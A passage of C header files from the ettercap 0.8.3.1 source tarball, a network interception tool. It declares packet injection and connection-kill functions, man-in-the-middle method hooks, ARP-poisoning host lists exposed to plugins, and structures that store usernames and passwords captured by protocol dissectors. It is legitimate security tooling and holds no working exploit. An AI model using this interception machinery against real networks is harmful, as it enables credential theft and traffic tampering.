(u_int32)*((u_int8 *)x+1)<<8| \ (u_int32)*((u_int8 *)x+0)<<0 \ ) #define pntos(x) ( (u_int16) \ ((u_int16)*((u_int8 *)x+1)<<0| \ (u_int16)*((u_int8 *)x+0)<<8) \ ) #define pntol(x) ( (u_int32)*((u_int8 *)x+3)<<0| \ (u_int32)*((u_int8 *)x+2)<<8| \ (u_int32)*((u_int8 *)x+1)<<16| \ (u_int32)*((u_int8 *)x+0)<<24 \ ) /* return little endian */ #define htons_inv(x) (u_int16)(x << 8) | (x >> 8) #define ORDER_ADD_SHORT(a, b) a = a + b #define ORDER_ADD_LONG(a, b) a = a + b #else /* LITTLE ENDIAN */ #define phtos(x) *(u_int16 *)(x) #define phtol(x) *(u_int32 *)(x) #define pntos(x) ntohs(*(u_int16 *)(x)) #define pntol(x) ntohl(*(u_int32 *)(x)) /* return little endian */ #define htons_inv(x) (u_int16)x #define ORDER_ADD_SHORT(a, b) a = htons(ntohs(a) + (int16_t)b) #define ORDER_ADD_LONG(a, b) a = htonl(ntohl(a) + (int32_t)b) #endif #define int_ntoa(x) inet_ntoa(*((struct in_addr *)&(x))) #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_inject.h000664 000000 000000 00000002677 13711276346 017215 0ustar00rootroot000000 000000 #ifndef ETTERCAP_INJECT_H #define ETTERCAP_INJECT_H #include #include #define FUNC_INJECTOR_PTR(func) int (*func)(struct packet_object *, size_t *) #define FUNC_INJECTOR(func) int func(struct packet_object *po, size_t *len) #define LENGTH *len #define LENGTH_PTR len #define SESSION_PASSTHRU(x,y) do{ \ x->prev_session = y->session; \ y->session = x; \ } while(0) #define SESSION_CLEAR(x) (x->session=NULL) #define EXECUTE_INJECTOR(x,y) do{ \ FUNC_INJECTOR_PTR(prev_injector); \ prev_injector = get_injector(x, y); \ if (prev_injector == NULL) \ return -E_NOTFOUND; \ if (prev_injector(PACKET, LENGTH_PTR) != E_SUCCESS) \ return -E_NOTHANDLED; \ } while(0) EC_API_EXTERN int inject_buffer(struct packet_object *po); EC_API_EXTERN void add_injector(u_int8 level, u_int32 type, FUNC_INJECTOR_PTR(injector)); EC_API_EXTERN void * get_injector(u_int8 level, u_int32 type); EC_API_EXTERN void inject_split_data(struct packet_object *po); EC_API_EXTERN int user_kill(struct conn_object *co); EC_API_EXTERN int user_inject(u_char *buf, size_t size, struct conn_object *co, int which); #define CHAIN_ENTRY 1 #define CHAIN_LINKED 2 /* Used to trace inject from udp to ip */ #define STATELESS_IP_MAGIC 0x0304e77e #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_interfaces.h000664 000000 000000 00000001767 13711276346 020063 0ustar00rootroot000000 000000 #ifndef ETTERCAP_INTERFACES_H #define ETTERCAP_INTERFACES_H /* colors for curses interface */ struct curses_color { int bg; int fg; int join1; int join2; int border; int title; int focus; int menu_bg; int menu_fg; int window_bg; int window_fg; int selection_bg; int selection_fg; int error_bg; int error_fg; int error_border; }; /* color pairs */ #define EC_COLOR 1 #define EC_COLOR_BORDER 2 #define EC_COLOR_TITLE 3 #define EC_COLOR_FOCUS 4 #define EC_COLOR_MENU 5 #define EC_COLOR_WINDOW 6 #define EC_COLOR_SELECTION 7 #define EC_COLOR_ERROR 8 #define EC_COLOR_ERROR_BORDER 9 #define EC_COLOR_JOIN1 10 #define EC_COLOR_JOIN2 11 /* exported functions */ EC_API_EXTERN void select_daemon_interface(void); EC_API_EXTERN void select_text_interface(void); EC_API_EXTERN void select_curses_interface(void); EC_API_EXTERN void select_gtk_interface(void); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_libettercap.h000664 000000 000000 00000000625 13711276346 020226 0ustar00rootroot000000 000000 #ifndef ETTERCAP_LIBETTERCAP_H #define ETTERCAP_LIBETTERCAP_H #include #include #include EC_API_EXTERN void libettercap_init(char* program, char* version); EC_API_EXTERN void libettercap_load_conf(void); EC_API_EXTERN void libettercap_ui_init(void); EC_API_EXTERN void libettercap_ui_start(void); EC_API_EXTERN void libettercap_ui_cleanup(void); #endif /* EOF */ ettercap-0.8.3.1/include/ec_log.h000664 000000 000000 00000006300 13711276346 016505 0ustar00rootroot000000 000000 #ifndef ETTERCAP_LOG_H #define ETTERCAP_LOG_H #include #include #include #include #include #include #include struct log_fd { int type; #define LOG_COMPRESSED 1 #define LOG_UNCOMPRESSED 0 gzFile cfd; int fd; }; /******************************************* * NOTE: all the int variable are stored * * in network order in the logfile * * * * NOTE: log files are compressed with * * the deflate algorithm * *******************************************/ /* * at the beginning of the file there * are the global information */ struct log_global_header { /* a magic number for file identification */ u_int16 magic; #define EC_LOG_MAGIC 0xe77e /* * offset to the first header in the log file * this assure that we can change this header * and the etterlog parser will be able to * parse also files created by older version */ u_int16 first_header; /* ettercap version */ char version[16]; /* creation time of the log */ struct timeval tv; /* the type of the log (packet or info) */ u_int32 type; }; /* * every packet in the log file has this format: * [header][data][header][data]... */ /* this is for a generic packet */ struct log_header_packet { struct timeval tv; u_int8 L2_src[MEDIA_ADDR_LEN]; u_int8 L2_dst[MEDIA_ADDR_LEN]; struct ip_addr L3_src; struct ip_addr L3_dst; u_int8 L4_proto; u_int8 L4_flags; u_int16 L4_src; u_int16 L4_dst; u_int32 len; }; /* * this is for host infos * * the format will be: * * [header][user][pass][info][banner][header][user][pass].... * * every header contains in the structure "variable" the length * of the successive banner, user, pass and info fields. */ struct log_header_info { u_int8 L2_addr[MEDIA_ADDR_LEN]; struct ip_addr L3_addr; u_int16 L4_addr; u_int8 L4_proto; char hostname[MAX_HOSTNAME_LEN]; u_int8 distance; u_int8 type; #define LOG_ARP_HOST (1<<7) u_char fingerprint[FINGER_LEN+1]; /* account information */ u_int8 failed; struct ip_addr client; struct variable { u_int16 user_len; u_int16 pass_len; u_int16 info_len; u_int16 banner_len; } var; }; EC_API_EXTERN int set_loglevel(int level, char *filename); #define LOG_STOP 0 #define LOG_INFO 1 #define LOG_PACKET 2 EC_API_EXTERN int set_msg_loglevel(int level, char *filename); #define LOG_TRUE 1 #define LOG_FALSE 0 EC_API_EXTERN void reset_logfile_owners(uid_t old_uid, gid_t old_gid, uid_t new_uid, gid_t new_gid); EC_API_EXTERN int log_open(struct log_fd *fd, char *filename); EC_API_EXTERN void log_close(struct log_fd *fd); EC_API_EXTERN void log_stop(void); EC_API_EXTERN int log_write_header(struct log_fd *fd, int type); EC_API_EXTERN void log_write_packet(struct log_fd *fd, struct packet_object *po); EC_API_EXTERN void log_write_info(struct log_fd *fd, struct packet_object *po); EC_API_EXTERN void log_write_info_arp_icmp(struct log_fd *fd, struct packet_object *po); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_lua.h000664 000000 000000 00000001221 13711276346 016502 0ustar00rootroot000000 000000 #ifndef ETTERCAP_LUA_H #define ETTERCAP_LUA_H #include #define ETTERCAP_LUA_MODULE "ettercap" #define ETTERCAP_C_API_LUA_MODULE "ettercap_c" EC_API_EXTERN int ec_lua_init(); EC_API_EXTERN int ec_lua_fini(); EC_API_EXTERN int ec_lua_cli_add_script(char * script); EC_API_EXTERN int ec_lua_cli_add_args(char * args); EC_API_EXTERN void ec_lua_print_info(FILE* debug_file); EC_API_EXTERN void ec_lua_print_version(FILE* debug_file); int ec_lua_dispatch_hooked_packet(int point, struct packet_object * po); void ec_lua_print_stack(FILE * io); #define LUA_FATAL_ERROR(x, ...) do { fprintf(stderr, x, ## __VA_ARGS__ ); exit(-1);} while(0) #endif ettercap-0.8.3.1/include/ec_manuf.h000664 000000 000000 00000000264 13711276346 017035 0ustar00rootroot000000 000000 #ifndef ETTERCAP_MANUF_H #define ETTERCAP_MANUF_H EC_API_EXTERN int manuf_init(void); EC_API_EXTERN char * manuf_search(const char *m); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_mitm.h000664 000000 000000 00000001233 13711276346 016672 0ustar00rootroot000000 000000 #ifndef ETTERCAP_MITM_H #define ETTERCAP_MITM_H struct mitm_method { char *name; int (*start)(char *args); void (*stop)(void); }; /* exported functions */ EC_API_EXTERN void mitm_add(struct mitm_method *mm); EC_API_EXTERN int mitm_set(char *name); EC_API_EXTERN int mitm_start(void); EC_API_EXTERN void mitm_stop(void); EC_API_EXTERN void only_mitm(void); EC_API_EXTERN int is_mitm_active(char *name); /* an ugly hack to make accessible the arp poisoning lists to plugins */ LIST_HEAD(hosts_group, hosts_list); EC_API_EXTERN struct hosts_group arp_group_one; EC_API_EXTERN struct hosts_group arp_group_two; #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_network.h000664 000000 000000 00000001454 13711276346 017422 0ustar00rootroot000000 000000 #ifndef ETTERCAP_INIT_H #define ETTERCAP_INIT_H #include #include #include #include /* per interface data */ struct iface_env { char* name; struct ip_addr ip; struct ip_addr network; struct ip_addr netmask; u_int8 mac[MEDIA_ADDR_LEN]; LIST_HEAD(,net_list) ip6_list; int dlt; u_int16 mtu; u_int8 is_ready :1; u_int8 is_live :1; u_int8 has_ipv4 :1; u_int8 has_ipv6 :1; u_int8 unoffensive:1; pcap_t* pcap; libnet_t* lnet; u_char* pbuf; /* buffer to be used to handle the packet on the arriving interface*/ }; EC_API_EXTERN void network_init(); EC_API_EXTERN void secondary_sources_foreach(void (*callback)(struct iface_env*)); EC_API_EXTERN struct iface_env* iface_by_mac(u_int8 mac[MEDIA_ADDR_LEN]); #endif ettercap-0.8.3.1/include/ec_os_mingw.h000664 000000 000000 00000014602 13711276346 017552 0ustar00rootroot000000 000000 #ifndef ETTERCAP_OS_MINGW_H #define ETTERCAP_OS_MINGW_H /* This file is *not* MingW specific, but Ettercap requires gcc. * So that leaves other Win32 compilers out. */ #include /* for alloca() */ #include /* u_char etc. */ #if !defined(HAVE_GETUID) #define getuid() (0) #endif #if !defined(HAVE_GETGID) #define getgid() (0) #endif #if !defined(HAVE_GETEUID) #define geteuid() (0) #endif #if !defined(HAVE_GETEUID) #define getegid() (0) #endif #if !defined(HAVE_SETUID) #define setuid(x) (0) #endif #if !defined(HAVE_SETGID) #define setgid(x) (0) #endif #if !defined(HAVE_RANDOM) #define random() rand() #endif #if !defined(HAVE_SRANDOM) #define srandom(s) srand(s) #endif #if !defined(_TIMEVAL_DEFINED) && !defined(HAVE_STRUCT_TIMEVAL) #define _TIMEVAL_DEFINED struct timeval { long tv_sec; long tv_usec; }; #endif #if !defined(HAVE_STRUCT_TIMEZONE) #define HAVE_STRUCT_TIMEZONE struct timezone { int tz_minuteswest; /* minutes west of Greenwich */ int tz_dsttime; /* type of dst correction */ }; #endif #undef _U_ #if defined(__GNUC__) #define _U_ __attribute__((unused)) #else #define _U_ #endif #ifndef EINPROGRESS #define EINPROGRESS WSAEINPROGRESS #endif #ifndef EALREADY #define EALREADY WSAEALREADY #endif #ifndef EWOULDBLOCK #define EWOULDBLOCK WSAEWOULDBLOCK #endif #ifndef EISCONN #define EISCONN WSAEISCONN #endif /* Only used in socket code */ #undef EINTR #define EINTR WSAEINTR #undef EAGAIN #define EAGAIN WSAEWOULDBLOCK #define gettimeofday(tv,tz) ec_win_gettimeofday (tv, tz) #define strsignal(signo) ec_win_strsignal (signo) #define poll(p,n,t) ec_win_poll (p,n,t) #define dn_expand(m,e,c,ex,l) ec_win_dn_expand (m, e, c, ex, l) #define dn_comp(e,c,l,d,ld) ec_win_dn_comp(e,c,l,d,ld) EC_API_EXTERN int ec_win_dn_expand (const u_char *msg, const u_char *eom_orig, const u_char *comp_dn, char *exp_dn, int length); EC_API_EXTERN int ec_win_dn_comp (const char *exp_dn, u_char *comp_dn, int length, u_char **dnptrs, u_char **lastdnptr); EC_API_EXTERN int ec_win_gettimeofday (struct timeval *tv, struct timezone *tz); EC_API_EXTERN const char *ec_win_strsignal (int signo); /* poll() emulation */ #define POLLIN 0x0001 #define POLLPRI 0x0002 /* not used */ #define POLLOUT 0x0004 #define POLLERR 0x0008 #define POLLHUP 0x0010 /* not used */ #define POLLNVAL 0x0020 /* not used */ struct pollfd { int fd; int events; /* in param: what to poll for */ int revents; /* out param: what events occurred */ }; #undef HAVE_POLL #define HAVE_POLL 1 EC_API_EXTERN int ec_win_poll (struct pollfd *p, int num, int timeout); /* User/program dir */ EC_API_EXTERN const char *ec_win_get_user_dir (void); EC_API_EXTERN const char *ec_win_get_ec_dir (void); /* This is a stupid hack. How can we on compile time know the install location on a * non-Unix system? */ #ifndef INSTALL_PREFIX #define INSTALL_PREFIX ec_win_get_ec_dir() #endif #ifndef INSTALL_EXECPREFIX #define INSTALL_EXECPREFIX ec_win_get_ec_dir() #endif #ifndef INSTALL_SYSCONFDIR #define INSTALL_SYSCONFDIR ec_win_get_ec_dir() #endif #ifndef INSTALL_BINDIR #define INSTALL_BINDIR ec_win_get_ec_dir() #endif #ifndef INSTALL_LIBDIR #define INSTALL_LIBDIR "/lib" /* this cannot be a function (sigh) */ #endif #ifndef INSTALL_DATADIR #define INSTALL_DATADIR "/share" /* this cannot be a function (sigh) */ #endif /* dlopen() emulation (not exported) */ #if !defined(HAVE_DLOPEN) #define RTLD_NOW 0 /* No importance */ #define RTLD_LOCAL 0 /* No importance */ #define RTLD_NOW 0 #define PLUGIN_EXT "*.dll" #define dlopen(dll,flg) ec_win_dlopen (dll, flg) #define lt_dlopen(dll) ec_win_dlopen (dll, 0) #define lt_dlopenext(dll) ec_win_dlopen (dll, 0) #define dlsym(hnd,func) ec_win_dlsym (hnd, func) #define lt_dlsym(hnd,func) ec_win_dlsym (hnd, func) #define dlclose(hnd) ec_win_dlclose (hnd) #define lt_dlclose(hnd) ec_win_dlclose (hnd) #define dlerror() ec_win_dlerror() #define lt_dlerror() ec_win_dlerror() #define lt_dlinit() (0) #define lt_dlexit() (0) EC_API_EXTERN void *ec_win_dlopen (const char *dll_name, int flags _U_); EC_API_EXTERN void *ec_win_dlsym (const void *dll_handle, const char *func_name); EC_API_EXTERN void ec_win_dlclose (const void *dll_handle); EC_API_EXTERN const char *ec_win_dlerror (void); #endif /* * Unix process emulation */ #if !defined(HAVE_FORK) #define fork() ec_win_fork() EC_API_EXTERN int ec_win_fork(void); #endif #if !defined(HAVE_WAIT) #define wait(st) ec_win_wait(st) #define WEXITSTATUS(w) 1 #define WIFEXITED(w) 1 EC_API_EXTERN int ec_win_wait (int *status); #endif /* Missing stuff for ec_resolv.h / ec_win_dnexpand() */ #ifndef INT16SZ #define INT16SZ 2 #endif #ifndef INT32SZ #define INT32SZ 4 #endif #undef GETSHORT #define GETSHORT(s, cp) do { \ register u_char *t_cp = (u_char *)(cp); \ (s) = ((u_short)t_cp[0] << 8) \ | ((u_short)t_cp[1]); \ (cp) += INT16SZ; \ } while (0) #undef GETLONG #define GETLONG(l, cp) do { \ register u_char *t_cp = (u_char *)(cp); \ (l) = ((u_long)t_cp[0] << 24) \ | ((u_long)t_cp[1] << 16) \ | ((u_long)t_cp[2] << 8) \ | ((u_long)t_cp[3]); \ (cp) += INT32SZ; \ } while (0) #undef PUTSHORT #define PUTSHORT(s, cp) do { \ register u_short t_s = (u_short)(s); \ register u_char *t_cp = (u_char *)(cp); \ *t_cp++ = t_s >> 8; \ *t_cp = t_s; \ (cp) += INT16SZ; \ } while (0) #undef PUTLONG #define PUTLONG(l, cp) do { \ register u_long t_l = (u_long)(l); \ register u_char *t_cp = (u_char *)(cp); \ *t_cp++ = t_l >> 24; \ *t_cp++ = t_l >> 16; \ *t_cp++ = t_l >> 8; \ *t_cp = t_l; \ (cp) += INT32SZ; \ } while (0) /* * Misc. stuff */ #define strerror ec_win_strerror EC_API_EXTERN char *ec_win_strerror(int err); EC_API_EXTERN int ec_win_pcap_stop(const void *pcap_handle); #endif /* EC_WIN_MISC_H */ ettercap-0.8.3.1/include/ec_packet.h000664 000000 000000 00000010211 13711276346 017167 0ustar00rootroot000000 000000 #ifndef ETTERCAP_PACKET_H #define ETTERCAP_PACKET_H #include #include #include #include #include #include struct packet_object { /* timestamp of the packet */ struct timeval ts; struct L2 { u_int8 proto; u_char * header; u_int len; u_int8 src[MEDIA_ADDR_LEN]; u_int8 dst[MEDIA_ADDR_LEN]; u_int8 flags; #define PO_L2_FCS 0x01 } L2; struct L3 { u_int16 proto; u_char * header; u_char * options; u_int len; size_t payload_len; size_t optlen; struct ip_addr src; struct ip_addr dst; u_int8 ttl; } L3; struct L4 { u_int8 proto; u_int8 flags; u_char * header; u_char * options; u_int len; size_t optlen; u_int16 src; u_int16 dst; u_int32 seq; u_int32 ack; } L4; struct data { u_char * data; u_int len; /* * buffer containing the data to be displayed. * some dissector decripts the traffic, but the packet must be forwarded as * is, so the decripted data must be placed in a different buffer. * this is that buffer and it is malloced by tcp or udp dissector. */ size_t disp_len; u_char * disp_data; /* for modified packet this is the delta for the length */ int delta; size_t inject_len; /* len of the injection */ u_char *inject; /* the buffer used for injection */ } DATA; u_int fwd_len; /* length of the packet to be forwarded */ u_char * fwd_packet; /* the pointer to the buffer to be forwarded */ u_int len; /* total length of the packet */ u_char * packet; /* the buffer containing the real packet */ /* Trace current session for injector chain */ struct ec_session *session; u_int16 flags; /* flags relative to the packet */ #define PO_IGNORE ((u_int16)(1)) /* this packet should not be processed (e.g. sniffing TARGETS didn't match it) */ #define PO_DONT_DISSECT ((u_int16)(1<<1)) /* this packet should not be processed by dissector (used during the arp scan) */ #define PO_FORWARDABLE ((u_int16)(1<<2)) /* the packet has our MAC address, by the IP is not ours */ #define PO_FORWARDED ((u_int16)(1<<3)) /* the packet was forwarded by us */ #define PO_FROMIFACE ((u_int16)(1<<4)) /* this packet comes from the primary interface */ #define PO_FROMBRIDGE ((u_int16)(1<<5)) /* this packet comes form the bridged interface */ #define PO_MODIFIED ((u_int16)(1<<6)) /* it needs checksum recalculation before forwarding */ #define PO_DROPPED ((u_int16)(1<<7)) /* the packet has to be dropped */ #define PO_DUP ((u_int16)(1<<8)) /* the packet is a duplicate we have to free the buffer on destroy */ #define PO_FORGED ((u_int16)(1<<9)) /* the packet is created by ourselves */ #define PO_EOF ((u_int16)(1<<10)) /* we are reading from a file and this is the last packet */ #define PO_FROMSSL ((u_int16)(1<<11)) /* the packet is coming from a ssl wrapper */ #define PO_SSLSTART ((u_int16)(1<<12)) /* ssl wrapper has to enter SSL state */ /* * here are stored the user and pass collected by dissectors * the "char *" are malloc(ed) by dissectors */ struct dissector_info DISSECTOR; /* the struct for passive identification */ struct passive_info PASSIVE; }; EC_API_EXTERN struct packet_object* packet_allocate_object(u_char *data, u_int len); EC_API_EXTERN int packet_create_object(struct packet_object *po, u_char * buf, u_int len); EC_API_EXTERN int packet_destroy_object(struct packet_object *po); EC_API_EXTERN int packet_disp_data(struct packet_object *po, u_char *buf, u_int len); EC_API_EXTERN struct packet_object * packet_dup(struct packet_object *po, u_char flag); /* Do we want to duplicate data? */ #define PO_DUP_NONE 0 #define PO_DUP_PACKET 1 #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_parser.h000664 000000 000000 00000000233 13711276346 017217 0ustar00rootroot000000 000000 #ifndef ETTERCAP_PARSER_H #define ETTERCAP_PARSER_H EC_API_EXTERN void parse_options(int argc, char **argv); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_passive.h000664 000000 000000 00000000437 13711276346 017403 0ustar00rootroot000000 000000 #ifndef ETTERCAP_PASSIVE_H #define ETTERCAP_PASSIVE_H EC_API_EXTERN int is_open_port(u_int8 proto, u_int16 port, u_int8 flags); EC_API_EXTERN void print_host(struct host_profile *h); EC_API_EXTERN void print_host_xml(struct host_profile *h); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_plugins.h000664 000000 000000 00000004236 13711276346 017413 0ustar00rootroot000000 000000 #ifndef ETTERCAP_PLUGINS_H #define ETTERCAP_PLUGINS_H #include #include #include #include struct plugin_ops { char *ettercap_version; /* ettercap version MUST be the global EC_VERSION */ char *name; /* the name of the plugin */ char *info; /* a short description of the plugin */ char *version; /* the plugin version. note: 15 will be displayed as 1.5 */ int (*init)(void *); /* activation function */ int (*fini)(void *); /* deactivation function */ }; struct plugin_list { char *name; bool exists; LIST_ENTRY(plugin_list) next; }; #ifdef OS_WINDOWS #define PLUGIN_PATTERN "ec_*.dll" #else #define PLUGIN_PATTERN "ec_*.so" #endif EC_API_EXTERN void plugin_load_all(void); EC_API_EXTERN int plugin_load_single(const char *path, char *name); EC_API_EXTERN int plugin_register(void *handle, struct plugin_ops *ops); EC_API_EXTERN int plugin_list_walk(int min, int max, void (*func)(char, struct plugin_ops *)); #define PLP_MIN 1 #define PLP_MAX INT_MAX EC_API_EXTERN int plugin_is_activated(char *name); EC_API_EXTERN int search_plugin(char *name); /* use these to activate and deactivate a plugin; these are *imported* from plugins */ EC_API_EXTERN int plugin_init(char *name); EC_API_EXTERN int plugin_fini(char *name); EC_API_EXTERN int plugin_kill_thread(char *name, char *thread); #define PLUGIN_FINISHED 0 #define PLUGIN_RUNNING 1 EC_API_EXTERN void plugin_list(void); EC_API_EXTERN void free_plugin_list(struct plugin_list_t plugins); #define PLUGIN_LOCK(x) \ do{ \ if (pthread_mutex_trylock(&x)) { \ ec_thread_exit(); \ return NULL; \ } \ } while(0) #define PLUGIN_UNLOCK(x) \ do{ \ pthread_mutex_unlock(&x); \ } while(0) #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_poll.h000664 000000 000000 00000000356 13711276346 016677 0ustar00rootroot000000 000000 #ifndef ETTERCAP_POLL_H #define ETTERCAP_POLL_H EC_API_EXTERN int ec_poll_in(int fd, u_int msec); EC_API_EXTERN int ec_poll_out(int fd, u_int msec); EC_API_EXTERN int ec_poll_buffer(char *buf); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_profiles.h000664 000000 000000 00000003352 13711276346 017553 0ustar00rootroot000000 000000 #ifndef ETTERCAP_PROFILES_H #define ETTERCAP_PROFILES_H #include #include struct dissector_info { char *user; char *pass; char *info; char *content; char *banner; char *os; char failed; u_int8 advertised_proto; u_int16 advertised_port; }; /* the list of users for each port */ struct active_user { char *user; char *pass; char *info; u_int8 failed; struct ip_addr client; LIST_ENTRY(active_user) next; }; /* each port is indentified this way : */ struct open_port { u_int16 L4_addr; u_int8 L4_proto; /* the service banner */ char *banner; /* the list of users */ LIST_HEAD(, active_user) users_list_head; LIST_ENTRY(open_port) next; }; /* this contains all the info related to an host */ struct host_profile { u_int8 L2_addr[MEDIA_ADDR_LEN]; struct ip_addr L3_addr; char hostname[MAX_HOSTNAME_LEN]; char* os; /* the list of open ports */ LIST_HEAD(, open_port) open_ports_head; /* distance in hop (TTL) */ u_int8 distance; /* local or not ? */ u_int8 type; /* OS fingerprint */ u_char fingerprint[FINGER_LEN+1]; TAILQ_ENTRY(host_profile) next; }; /* exported functions */ EC_API_EXTERN void profile_purge_local(void); EC_API_EXTERN void profile_purge_remote(void); EC_API_EXTERN void profile_purge_all(void); EC_API_EXTERN int profile_convert_to_hostlist(void); EC_API_EXTERN int profile_dump_to_file(char *filename); /* fake forward declaration (profiles include packet and viceversa) */ struct packet_object; EC_API_EXTERN void profile_parse(struct packet_object *po); EC_API_EXTERN void * profile_print(int mode, void *list, char **desc, size_t len); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_proto.h000664 000000 000000 00000006347 13711276346 017102 0ustar00rootroot000000 000000 #ifndef ETTERCAP_PROTO_H #define ETTERCAP_PROTO_H #include /* interface layer types */ enum { IL_TYPE_NULL = 0x00, /* bsd loopback (used by some wifi cards in monitor mode) */ IL_TYPE_ETH = 0x01, /* ethernet */ IL_TYPE_TR = 0x06, /* token ring */ IL_TYPE_PPP = 0x09, /* PPP */ IL_TYPE_FDDI = 0x0a, /* fiber distributed data interface */ IL_TYPE_RAWIP = 0x0c, /* raw ip dump file */ IL_TYPE_WIFI = 0x69, /* wireless */ IL_TYPE_COOK = 0x71, /* linux cooked */ IL_TYPE_PRISM = 0x77, /* prism2 header for wifi dumps */ IL_TYPE_RADIO = 0x7f, /* radiotap header for wifi dumps */ IL_TYPE_PPI = 0xc0, /* per packet information */ IL_TYPE_ERF = 0xc5, /* ERF endace format */ }; /* link layer types */ enum { LL_TYPE_PPP_IP = 0x0021, LL_TYPE_IP = 0x0800, LL_TYPE_ARP = 0x0806, LL_TYPE_VLAN = 0x8100, LL_TYPE_IP6 = 0x86DD, LL_TYPE_PPP = 0x880B, LL_TYPE_PPPOE = 0x8864, LL_TYPE_PAP = 0xc023, LL_TYPE_MPLS = 0x8847, LL_TYPE_8021x = 0x888E }; /* network layer types */ enum { NL_TYPE_ICMP = 0x01, NL_TYPE_IPIP = 0x04, NL_TYPE_IP6 = 0x29, NL_TYPE_ESP = 0x32, NL_TYPE_ICMP6 = 0x3a, NL_TYPE_TCP = 0x06, NL_TYPE_UDP = 0x11, NL_TYPE_GRE = 0x2f, NL_TYPE_OSPF = 0x59, NL_TYPE_VRRP = 0x70 }; /* proto layer types */ enum { PL_DEFAULT = 0x0000, }; /* IPv6 options types */ /* NOTE: they may (but should not) conflict with network layer types! */ /* double check new definitions of either types. */ enum { LO6_TYPE_HBH = 0, /* Hop-By-Hop */ LO6_TYPE_RT = 0x2b, /* Routing */ LO6_TYPE_FR = 0x2c, /* Fragment */ LO6_TYPE_DST = 0x3c, /* Destination */ LO6_TYPE_NO = 0x3b, /* No Next Header */ }; /* TCP flags */ enum { TH_FIN = 0x01, TH_SYN = 0x02, TH_RST = 0x04, TH_PSH = 0x08, TH_ACK = 0x10, TH_URG = 0x20, TH_ECE = 0x40, /* rfc 2481/3168 */ TH_CWR = 0x80 /* rfc 2481/3168 */ }; /* ICMP types */ enum { ICMP_ECHOREPLY = 0, ICMP_DEST_UNREACH = 3, ICMP_REDIRECT = 5, ICMP_ECHO = 8, ICMP_TIME_EXCEEDED = 11, ICMP_NET_UNREACH = 0, ICMP_HOST_UNREACH = 1, }; /* ICMPv6 types */ enum { /* Errors */ ICMP6_DEST_UNREACH = 1, ICMP6_PKT_TOO_BIG = 2, ICMP6_TIME_EXCEEDED = 3, ICMP6_BAD_PARAM = 4, /* Info */ ICMP6_ECHO = 128, ICMP6_ECHOREPLY = 129, ICMP6_ROUTER_SOL = 133, ICMP6_ROUTER_ADV = 134, ICMP6_NEIGH_SOL = 135, ICMP6_NEIGH_ADV = 136, }; /* DHCP options */ enum { DHCP_MAGIC_COOKIE = 0x63825363, DHCP_DISCOVER = 0x01, DHCP_OFFER = 0x02, DHCP_REQUEST = 0x03, DHCP_ACK = 0x05, DHCP_OPT_NETMASK = 0x01, DHCP_OPT_ROUTER = 0x03, DHCP_OPT_DNS = 0x06, DHCP_OPT_DOMAIN = 0x0f, DHCP_OPT_RQ_ADDR = 0x32, DHCP_OPT_LEASE_TIME = 0x33, DHCP_OPT_MSG_TYPE = 0x35, DHCP_OPT_SRV_ADDR = 0x36, DHCP_OPT_RENEW_TIME = 0x3a, DHCP_OPT_CLI_IDENT = 0x3d, DHCP_OPT_FQDN = 0x51, DHCP_OPT_END = 0xff, DHCP_OPT_MIN_LEN = 0x12c, }; #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_queue.h000664 000000 000000 00000046614 13711276346 017064 0ustar00rootroot000000 000000 /* * * added the _SAFE functions from: * $FreeBSD: queue.h,v 1.56 2003/08/14 14:49:26 kan Exp $ * * the rest is copyrighted by: */ /* $OpenBSD: queue.h,v 1.14.4.3 2003/06/07 11:09:08 ho Exp $ */ /* $NetBSD: queue.h,v 1.11 1996/05/16 05:17:14 mycroft Exp $ */ /* * Copyright (c) 1991, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)queue.h 8.5 (Berkeley) 8/20/94 */ #ifndef ETTERCAP_QUEUE_H #define ETTERCAP_QUEUE_H /* to avoid conflict with system includes */ #define _SYS_QUEUE_H_ /* Needed because SLIST_HEAD is defined in too. */ #if defined(OS_WINDOWS) #if !defined(_WINNT_H) #error Include before #endif /* */ #undef SLIST_ENTRY #endif /* * This file defines five types of data structures: singly-linked lists, * lists, simple queues, tail queues, and circular queues. * * * A singly-linked list is headed by a single forward pointer. The elements * are singly linked for minimum space and pointer manipulation overhead at * the expense of O(n) removal for arbitrary elements. New elements can be * added to the list after an existing element or at the head of the list. * Elements being removed from the head of the 